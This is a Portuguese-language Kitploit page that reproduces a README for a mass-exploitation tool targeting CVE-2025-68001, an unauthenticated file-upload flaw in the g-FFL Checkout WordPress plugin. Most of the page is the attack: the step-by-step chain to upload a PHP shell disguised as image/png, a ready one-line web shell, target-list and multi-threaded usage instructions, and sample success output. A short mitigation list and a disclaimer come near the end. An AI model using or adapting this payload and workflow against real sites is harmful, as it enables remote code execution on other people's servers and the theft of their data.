Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-68001 — O plugin g-FFL Checkout para WordPress <= 2.1.0 é vulnerável a um Upload Arbitrário de Arquivos de alta prioridade. | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-68001
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubnxploited/cve-2025-68001

CVE-2025-68001

O plugin g-FFL Checkout para WordPress <= 2.1.0 é vulnerável a um Upload Arbitrário de Arquivos de alta prioridade.

Ver Repositório
1há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-68001

O plugin g-FFL Checkout do WordPress <= 2.1.0 é vulnerável a um upload arbitrário de arquivos de alta prioridade

root@kitploit:~
  _      _   _   _  _   _     _   _   _   _    
 / \  / |_ __ ) / \  ) |_ __ |_  (_) / \ / \ /|
 \_ \/  |_   /_ \_/ /_  _)   |_) (_) \_/ \_/  |
                                                 

Telegram CVE Python License


📡 Fique à frente da curva. Junte-se a @KNxploited no Telegram — sua fonte exclusiva para as últimas CVEs, zero-days e pesquisas de exploração de ponta. Atualizado constantemente. Não para todos.


📋 Visão Geral

CVE-2025-68001 é uma vulnerabilidade crítica de Upload Arbitrário de Arquivos Não Autenticado descoberta no plugin g-FFL Checkout do WordPress por garidium.

A vulnerabilidade permite que um atacante remoto não autenticado faça upload de arquivos arbitrários — incluindo web shells — para o servidor alvo através da ação AJAX ffl_upload_document, levando à Execução Remota de Código (RCE) completa.

CampoDetalhes
ID CVECVE-2025-68001
Pluging-FFL Checkout (g-ffl-checkout)
Versões Afetadasn/a até <= 2.1.0
Tipo de VulnerabilidadeUpload Ilimitado de Arquivos
ImpactoExecução Remota de Código (RCE)
AutenticaçãoNão Necessária
Severidade CVSSCrítica
PesquisadorNxploited

⚙️ Como Funciona

O exploit segue uma cadeia de ataque de múltiplas etapas precisa:

root@kitploit:~
1. GET /checkout
      ↓
   Extrai `checkout_nonce` dos dados JavaScript inline

2. POST /wp-admin/admin-ajax.php
      action=ffl_upload_document
      nonce=<extracted_nonce>
      document_type=document
      document=<shell.php disfarçado como image/png>
      ↓
   O servidor armazena o arquivo sem validação de extensão ou MIME

3. Analisa a resposta JSON
      ↓
   Extrai o caminho do arquivo enviado / nome de arquivo único

4. Acessa o shell enviado via HTTP
      ↓
   Execução Remota de Código alcançada ✔️

O plugin expõe um endpoint AJAX ffl_upload_document que:

  • Aceita uploads de arquivos sem verificação de autenticação
  • Não realiza validação de tipo de arquivo no servidor
  • Retorna o caminho do arquivo armazenado em sua resposta JSON

🔧 Requisitos

Instale todas as dependências antes de executar:

root@kitploit:~
pip install requests rich
DependênciaPropósito
requestsRequisições HTTP & gerenciamento de sessão
richInterface de terminal, barras de progresso, painéis
threadingProcessamento multi-thread de alvos

Python 3.8+ é necessário.


📂 Estrutura de Arquivos

root@kitploit:~
CVE-2025-68001/
├── CVE-2025-68001.py       # Script exploit principal
├── shell.php               # Web shell para enviar (você fornece)
├── list.txt                # URLs alvo (um por linha)
└── success_results.txt     # Saída de resultados gerada automaticamente

🚀 Uso

Passo 1 — Prepare seus Alvos

Crie um arquivo list.txt com uma URL alvo por linha:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

O script automaticamente adiciona http:// se nenhum esquema for fornecido.


Passo 2 — Prepare seu Shell

Coloque seu web shell PHP no mesmo diretório. Exemplo de shell mínimo:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Salve como shell.php (ou qualquer nome — você será solicitado a fornecê-lo).


Passo 3 — Execute o Exploit

root@kitploit:~
python CVE-2025-68001.py

Você será solicitado interativamente:

root@kitploit:~
Digite o nome do arquivo de alvos (padrão: list.txt):
> list.txt

Digite o nome do arquivo shell para enviar (padrão: shell.php):
> shell.php

Digite o número de threads (padrão: 50):
> 20

Passo 4 — Revise os Resultados

Exploits bem-sucedidos são salvos automaticamente em success_results.txt:

root@kitploit:~
https://target.com | /wp-content/uploads/ffl/abc123.php | abc123.php | shell.php

Cada linha contém:

  • URL alvo
  • Caminho do arquivo armazenado no servidor
  • Nome de arquivo único atribuído pelo servidor
  • Nome original do arquivo enviado

🖥️ Referência de Parâmetros do Script

ParâmetroPadrãoDescrição
Arquivo de alvoslist.txtArquivo contendo URLs alvo
Arquivo shellshell.phpShell PHP para enviar ao alvo
Número de threads50Trabalhadores concorrentes (máx: 50)

📊 Exemplo de Saída

root@kitploit:~
✔  https://victim.com  — /checkout reachable. Trying exploit...

┌─────────────────────────────────────────────────────┐
│                      Success                        │
│  https://victim.com                                 │
│  Original Name:  shell.php                          │
│  Unique Name:    a7f3c1d9e.php                      │
│  Stored Path:    /wp-content/uploads/ffl/a7f3c1.php │
└─────────────────────────────────────────────────────┘

Todos os alvos processados ✔️. Resultados salvos em: success_results.txt

🔍 Caminho do Código Vulnerável (Técnico)

A vulnerabilidade reside no manipulador AJAX do plugin registrado sem verificações de capacidade:

root@kitploit:~
// No authentication or capability check
add_action('wp_ajax_nopriv_ffl_upload_document', 'ffl_upload_document');

function ffl_upload_document() {
    // Nonce verified from /checkout page (publicly accessible)
    // No MIME type validation
    // No extension whitelist/blacklist
    move_uploaded_file($_FILES['document']['tmp_name'], $upload_path);
    wp_send_json_success(['file_path' => $upload_path]);
}

🛡️ Mitigação e Remediação

Se você é um proprietário de site ou desenvolvedor, tome as seguintes medidas imediatamente:

  • ✅ Atualize o plugin g-ffl-checkout para uma versão corrigida (> 2.1.0) se disponível
  • ✅ Desative o plugin até que um patch seja confirmado
  • ✅ Restrinja permissões de execução em diretórios de upload (ex.: regras .htaccess)
  • ✅ Implemente validação de tipo de arquivo no servidor e lista de permissões de extensão estrita
  • ✅ Monitore diretórios de upload em busca de arquivos .php suspeitos
  • ✅ Ative regras de WAF para bloquear requisições de upload de arquivos AJAX não autenticadas

⚠️ Aviso Legal

root@kitploit:~
ESTA FERRAMENTA É FORNECIDA ESTRITAMENTE PARA FINS EDUCACIONAIS
E DE PESQUISA DE SEGURANÇA AUTORIZADA.

Ao usar este script, você concorda explicitamente com o seguinte:

  • Você tem permissão EXPLÍCITA por escrito do proprietário do sistema alvo.
  • Você está operando em um laboratório controlado ou em um engajamento de teste de penetração autorizado.
  • Você NÃO usará esta ferramenta contra qualquer sistema que não possua ou não tenha autorização legal para testar.
  • O autor (Nxploited) não tem NENHUMA responsabilidade por qualquer dano, perda de dados, consequências legais ou uso indevido resultante desta ferramenta.

O uso não autorizado desta ferramenta contra sistemas sem permissão é ILEGAL
e pode violar leis incluindo, mas não se limitando a:
  — Computer Fraud and Abuse Act (CFAA)
  — Diretiva da UE sobre Ataques contra Sistemas de Informação
  — E leis equivalentes em sua jurisdição.

USE COM RESPONSABILIDADE. HACKEIE ETICAMENTE.

👤 Autor

NomeNxploited
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Siga @KNxploited no Telegram para receber as últimas divulgações de vulnerabilidades, lançamentos de exploits e pesquisas de segurança — antes de qualquer outra pessoa.


Construído com precisão por Nxploited · Apenas para uso educacional
Baixar ferramenta